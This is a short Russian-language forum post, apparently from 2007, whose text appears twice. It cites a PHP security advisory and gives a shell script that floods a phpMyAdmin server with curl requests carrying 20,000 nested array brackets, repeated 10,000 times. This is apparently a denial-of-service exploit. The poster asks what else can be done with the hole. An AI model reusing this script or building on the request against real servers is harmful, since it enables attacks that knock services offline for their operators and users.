pento
13.03.2007, 21:02
Собственно
есть
http://www.php-security.org/MOPB/MOPB-02-2007.html
и есть бажный код.
Пока додумался только до
#!/bin/sh
foo="curl http://xxx.xxx.xx.xx/phpmyadmin/ -d a"`php -r 'echo str_repeat("[a]",20000);'`"=1"
for i in `seq 1 10000`; do
`$foo`;
done
Может ещё чего можно интересного замутить, используя дыру эту?
есть
http://www.php-security.org/MOPB/MOPB-02-2007.html
и есть бажный код.
Пока додумался только до
#!/bin/sh
foo="curl http://xxx.xxx.xx.xx/phpmyadmin/ -d a"`php -r 'echo str_repeat("[a]",20000);'`"=1"
for i in `seq 1 10000`; do
`$foo`;
done
Может ещё чего можно интересного замутить, используя дыру эту?